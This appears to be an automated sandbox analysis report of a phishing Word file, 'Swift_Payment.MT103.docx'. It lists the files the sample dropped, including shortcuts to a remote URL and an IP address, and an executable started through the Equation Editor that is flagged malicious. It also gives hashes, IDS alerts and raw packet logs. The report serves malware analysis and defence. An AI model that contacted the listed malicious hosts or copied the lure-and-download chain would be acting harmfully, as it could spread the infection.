Preview:	L..................F.... .....>..{....>..{..^..K._..[(...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....z.2.[(...RP. .SWIFT_~1.DOC..^.......Q.y.Q.y...8.....................S.w.i.f.t._.P.a.y.m.e.n.t...M.T.1.0.3...d.o.c.x.......................-...8...[............?J......C:\Users\..#...................\\888683\Users.user\Desktop\Swift_Payment.MT103.docx./.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.w.i.f.t._.P.a.y.m.e.n.t...M.T.1.0.3...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......888683..........D_..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\e9yj.url Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows 95 Internet shortcut text (URL=<http://xy2.eu/e9yj>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	44
Entropy (8bit):	4.498871107126152
Encrypted:	false
SSDEEP:	3:HRAbABGQYm/7cZbcc6:HRYFVm/7yc/
MD5:	F5C72945D1BDAE24FB4393F7D97E953F
SHA1:	54F64CEB083CF2A20C31EEFD64DF7E0878D84CA9
SHA-256:	4E41F3B4FACF193C7F5346832A5EB04EA96FDF0DDF1465D798D354EA9788D1D2
SHA-512:	B4F3E6EA9C84A696937D9B3C40066A621D685F809BD7E90DA9C7BD85F78719BB2B008393ADAB67F53E970DF55B39C40DF798CD5AD5EB6CEFBDEE664A76F420ED
Malicious:	false
Preview:	[InternetShortcut]..URL=http://xy2.eu/e9yj..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	137
Entropy (8bit):	5.012685337707811
Encrypted:	false
SSDEEP:	3:5cGWVvM+biLlQQXTMW9/NbcIALdWCulbcIALdWCmxW9/NbcIALdWCv:mvM+mFh/N4KV4Kg/N4Ks
MD5:	9D54F65C474E3F0A12BF527B27FD6676
SHA1:	9CF0F170E0D247A02111B94DA088F1C2B4A1F218
SHA-256:	8DD61A3211C69BDDE73E33E295CAC121EF2693A9CC3B08A6AAFA374F016A65B6
SHA-512:	8D4FE57EEFD52941CF50B93DE4B7E54D9444EE16273D034760558E5BCCEBD34F808BB4B8CAF0EB7B3847C80FE2EC1C53BA25210506CBD5985335B0A32EF69E32
Malicious:	false
Preview:	e9yj.url=0..oti on 192.3.141.164.url=0..[misc]..Swift_Payment.MT103.LNK=0..Swift_Payment.MT103.LNK=0..[misc]..Swift_Payment.MT103.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\oti on 192.3.141.164.url Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows 95 Internet shortcut text (URL=<http://192.3.141.164/oti/>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	51
Entropy (8bit):	4.566418048705484
Encrypted:	false
SSDEEP:	3:HRAbABGQYm/PXaRKMD:HRYFVm/PqRT
MD5:	FE717A28A8B635BCE51A0137BFABDF24
SHA1:	3070711C4A68953981A28E2A51D1DD70078305FA
SHA-256:	17120A45D48F98C66E2E0A286C39ACD8E028140E4CF9CECE80DADD45B7385212
SHA-512:	84AED103F7CDB7102492C3D16310D404921994F7D2476400119FB14C0891D8685B3792911F9D40D533C9D2BAE55BBB4C9A516CF8B752253DF6C109B6054D9453
Malicious:	false
Preview:	[InternetShortcut]..URL=http://192.3.141.164/oti/..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
MD5:	39EB3053A717C25AF84D576F6B2EBDD2
SHA1:	F6157079187E865C1BAADCC2014EF58440D449CA
SHA-256:	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
SHA-512:	5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

C:\Users\user\Desktop\~$ift_Payment.MT103.docx Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
MD5:	39EB3053A717C25AF84D576F6B2EBDD2
SHA1:	F6157079187E865C1BAADCC2014EF58440D449CA
SHA-256:	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
SHA-512:	5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	939008
Entropy (8bit):	7.489482502838042
Encrypted:	false
SSDEEP:	24576:TuyAioqXVnyKKvkCB7dEnfDzVd+rl7GJNeBUdt:BF1Kv1d2fDJArUJwBU
MD5:	616A10FDC3307FD483916E1B578C9F9C
SHA1:	940A937103F7F406291C416C6EC4D601FBCA7234
SHA-256:	AF9E4AF9E1C7C2991D0FE0E5EEDD11A819CB5D697EF75606AE620F3B7FD20775
SHA-512:	F31CB753E6CE0DFBBB06535A9F4CBCD655681CC610263921DBDF71D5E67438BC5E87410C9F3959CD49F6218FD0EED251418BD7ED02EDD90BCC9DC9473FBD3492
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 26%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`................................. ........@.. ....................................@.....................................K..................................._................................................ ............... ..H............text........ ...................... ..`.sdata..............................@....rsrc...............................@..@.reloc...............R..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	Microsoft Word 2007+
Entropy (8bit):	6.8993642339469075
TrID:	Word Microsoft Office Open XML Format document (49504/1) 49.01% Word Microsoft Office Open XML Format document (43504/1) 43.07% ZIP compressed archive (8000/1) 7.92%
File name:	Swift_Payment.MT103.docx
File size:	10331
MD5:	b222a3ced51fbd79d5fb84bbca12e509
SHA1:	bc2f5c72b5e3ddd58e991d83c94cb071152a2671
SHA256:	3332ad1461dc79f815e43bf55a6e105bddef5324468b041a97457de7dfcaf2b4
SHA512:	bac799cf4086e1e13a9131655c8b259a5daced07fe307d7a7b28c9732288fcd44b723c5ebad7cc893196974af24c02eded457989bd95291666fb74253ad8d4cd
SSDEEP:	192:ScIMmtPOVlG/bFD+cFOR5SEzBC4vNqDs1w8hI23iJ:SPXywFDNO/hlqMe
File Content Preview:	PK..........!....7f... .......[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	e4e6a2a2a4b4b4a4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
06/11/21-15:58:54.837615	TCP	1042	WEB-IIS view source via translate header	49170	80	192.168.2.22	93.157.97.6
06/11/21-15:59:10.403117	TCP	1042	WEB-IIS view source via translate header	49171	80	192.168.2.22	93.157.97.6
06/11/21-15:59:44.959642	TCP	1042	WEB-IIS view source via translate header	49175	80	192.168.2.22	93.157.97.6
06/11/21-16:00:10.156812	TCP	1042	WEB-IIS view source via translate header	49176	80	192.168.2.22	93.157.97.6
06/11/21-16:01:16.380748	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49178	34.102.136.180	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 11, 2021 15:58:37.918456078 CEST	49167	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:58:37.984781027 CEST	80	49167	93.157.97.6	192.168.2.22
Jun 11, 2021 15:58:37.984957933 CEST	49167	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:58:37.986566067 CEST	49167	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:58:38.091751099 CEST	80	49167	93.157.97.6	192.168.2.22
Jun 11, 2021 15:58:38.348437071 CEST	80	49167	93.157.97.6	192.168.2.22
Jun 11, 2021 15:58:38.348500967 CEST	80	49167	93.157.97.6	192.168.2.22
Jun 11, 2021 15:58:38.348541975 CEST	80	49167	93.157.97.6	192.168.2.22
Jun 11, 2021 15:58:38.348582029 CEST	80	49167	93.157.97.6	192.168.2.22
Jun 11, 2021 15:58:38.348630905 CEST	80	49167	93.157.97.6	192.168.2.22
Jun 11, 2021 15:58:38.348675966 CEST	80	49167	93.157.97.6	192.168.2.22
Jun 11, 2021 15:58:38.348707914 CEST	80	49167	93.157.97.6	192.168.2.22
Jun 11, 2021 15:58:38.348754883 CEST	49167	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:58:38.348922014 CEST	49167	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:58:38.349046946 CEST	49167	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:58:38.356322050 CEST	49167	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:58:38.356374025 CEST	49167	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:58:38.940670013 CEST	49168	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:58:39.006841898 CEST	80	49168	93.157.97.6	192.168.2.22
Jun 11, 2021 15:58:39.007117033 CEST	49168	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:58:39.008294106 CEST	49168	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:58:39.075773001 CEST	80	49168	93.157.97.6	192.168.2.22
Jun 11, 2021 15:58:39.076772928 CEST	49168	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:58:39.147640944 CEST	80	49168	93.157.97.6	192.168.2.22
Jun 11, 2021 15:58:39.150337934 CEST	49169	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:58:39.290692091 CEST	80	49169	192.3.141.164	192.168.2.22
Jun 11, 2021 15:58:39.290838957 CEST	49169	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:58:39.291786909 CEST	49169	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:58:39.351310015 CEST	49168	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:58:39.413681984 CEST	80	49168	93.157.97.6	192.168.2.22
Jun 11, 2021 15:58:39.413855076 CEST	49168	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:58:39.434138060 CEST	80	49169	192.3.141.164	192.168.2.22
Jun 11, 2021 15:58:39.647764921 CEST	49169	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:58:44.948556900 CEST	80	49169	192.3.141.164	192.168.2.22
Jun 11, 2021 15:58:44.948887110 CEST	49169	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:58:44.948988914 CEST	49169	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:58:45.091626883 CEST	80	49169	192.3.141.164	192.168.2.22
Jun 11, 2021 15:58:45.149046898 CEST	80	49168	93.157.97.6	192.168.2.22
Jun 11, 2021 15:58:45.149153948 CEST	49168	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:58:45.149446011 CEST	49168	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:58:45.215540886 CEST	80	49168	93.157.97.6	192.168.2.22
Jun 11, 2021 15:58:54.769942999 CEST	49170	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:58:54.836483955 CEST	80	49170	93.157.97.6	192.168.2.22
Jun 11, 2021 15:58:54.836698055 CEST	49170	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:58:54.837615013 CEST	49170	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:58:54.943741083 CEST	80	49170	93.157.97.6	192.168.2.22
Jun 11, 2021 15:58:55.071278095 CEST	80	49170	93.157.97.6	192.168.2.22
Jun 11, 2021 15:58:55.071371078 CEST	80	49170	93.157.97.6	192.168.2.22
Jun 11, 2021 15:58:55.071422100 CEST	80	49170	93.157.97.6	192.168.2.22
Jun 11, 2021 15:58:55.071436882 CEST	49170	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:58:55.071472883 CEST	80	49170	93.157.97.6	192.168.2.22
Jun 11, 2021 15:58:55.071532011 CEST	80	49170	93.157.97.6	192.168.2.22
Jun 11, 2021 15:58:55.071551085 CEST	49170	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:58:55.071583986 CEST	80	49170	93.157.97.6	192.168.2.22
Jun 11, 2021 15:58:55.071625948 CEST	80	49170	93.157.97.6	192.168.2.22
Jun 11, 2021 15:58:55.071643114 CEST	49170	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:58:55.073470116 CEST	49170	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:59:10.335896015 CEST	49171	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:59:10.402013063 CEST	80	49171	93.157.97.6	192.168.2.22
Jun 11, 2021 15:59:10.402190924 CEST	49171	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:59:10.403116941 CEST	49171	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:59:10.508843899 CEST	80	49171	93.157.97.6	192.168.2.22
Jun 11, 2021 15:59:10.651000023 CEST	80	49171	93.157.97.6	192.168.2.22
Jun 11, 2021 15:59:10.651046991 CEST	80	49171	93.157.97.6	192.168.2.22
Jun 11, 2021 15:59:10.651086092 CEST	80	49171	93.157.97.6	192.168.2.22
Jun 11, 2021 15:59:10.651171923 CEST	80	49171	93.157.97.6	192.168.2.22
Jun 11, 2021 15:59:10.651187897 CEST	49171	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:59:10.651213884 CEST	80	49171	93.157.97.6	192.168.2.22
Jun 11, 2021 15:59:10.651254892 CEST	80	49171	93.157.97.6	192.168.2.22
Jun 11, 2021 15:59:10.651288033 CEST	49171	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:59:10.651336908 CEST	49171	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:59:10.651345015 CEST	80	49171	93.157.97.6	192.168.2.22
Jun 11, 2021 15:59:10.651530027 CEST	49171	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:59:25.735044956 CEST	49172	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:59:25.801238060 CEST	80	49172	93.157.97.6	192.168.2.22
Jun 11, 2021 15:59:25.801389933 CEST	49172	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:59:25.802648067 CEST	49172	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:59:25.869736910 CEST	80	49172	93.157.97.6	192.168.2.22
Jun 11, 2021 15:59:25.869844913 CEST	49172	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:59:25.877032042 CEST	49172	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:59:25.947845936 CEST	80	49172	93.157.97.6	192.168.2.22
Jun 11, 2021 15:59:25.947880983 CEST	80	49172	93.157.97.6	192.168.2.22
Jun 11, 2021 15:59:25.948189020 CEST	49172	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:59:26.000824928 CEST	49173	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:26.141083002 CEST	80	49173	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:26.141247988 CEST	49173	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:26.142316103 CEST	49173	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:26.283691883 CEST	80	49173	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:26.283726931 CEST	80	49173	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:26.283746958 CEST	80	49173	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:26.283771992 CEST	80	49173	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:26.283797026 CEST	80	49173	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:26.283817053 CEST	80	49173	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:26.283821106 CEST	49173	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:26.283839941 CEST	80	49173	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:26.283863068 CEST	80	49173	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:26.283864975 CEST	49173	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:26.283874989 CEST	49173	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:26.283881903 CEST	49173	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:26.283885956 CEST	80	49173	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:26.283889055 CEST	49173	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:26.283895969 CEST	49173	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:26.283901930 CEST	49173	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:26.283905983 CEST	80	49173	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:26.283909082 CEST	49173	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:26.283916950 CEST	49173	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:26.283951044 CEST	49173	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:26.285931110 CEST	49173	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:26.297173977 CEST	49172	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:59:26.364032030 CEST	80	49172	93.157.97.6	192.168.2.22
Jun 11, 2021 15:59:26.364181042 CEST	49172	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:59:26.365288973 CEST	49172	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:59:26.435184956 CEST	80	49172	93.157.97.6	192.168.2.22
Jun 11, 2021 15:59:26.435487986 CEST	49172	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:59:26.437504053 CEST	49173	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:26.580729008 CEST	80	49173	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:26.580981970 CEST	49173	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.268496990 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.408505917 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.408618927 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.409079075 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.551704884 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.551736116 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.551758051 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.551776886 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.551795959 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.551811934 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.551825047 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.551829100 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.551846027 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.551853895 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.551860094 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.551863909 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.551865101 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.551868916 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.551881075 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.551889896 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.551906109 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.551920891 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.563242912 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.693886995 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.693944931 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.693979979 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.694015980 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.694051981 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.694061041 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.694096088 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.694097042 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.694127083 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.694134951 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.694170952 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.694176912 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.694189072 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.694206953 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.694220066 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.694242954 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.694278955 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.694299936 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.694315910 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.694351912 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.694366932 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.694397926 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.694437027 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.694449902 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.694473028 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.694509983 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.694524050 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.694545984 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.694580078 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.694593906 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.694616079 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.694669962 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.695903063 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.834759951 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.834821939 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.834849119 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.834861994 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.834883928 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.834903002 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.834942102 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.834949970 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.834981918 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.834984064 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.835021973 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.835022926 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.835062981 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.835071087 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.835131884 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.835136890 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.835176945 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.835185051 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.835222960 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.835228920 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.835262060 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.835273027 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.835305929 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.835309982 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.835342884 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.835347891 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.835385084 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.835387945 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.835422993 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.835427046 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.835469961 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.835477114 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.835521936 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.835522890 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.835560083 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.835563898 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.835597992 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.835599899 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.835638046 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.835639000 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.835676908 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.835686922 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.835716009 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.835720062 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.835756063 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.835757017 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.835799932 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.835803986 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.835846901 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.835848093 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.835885048 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.835890055 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.835923910 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.835932016 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.835963964 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.835971117 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.836002111 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.836007118 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.836041927 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.836044073 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.836080074 CEST	80	49174	192.3.141.164	192.168.2.22
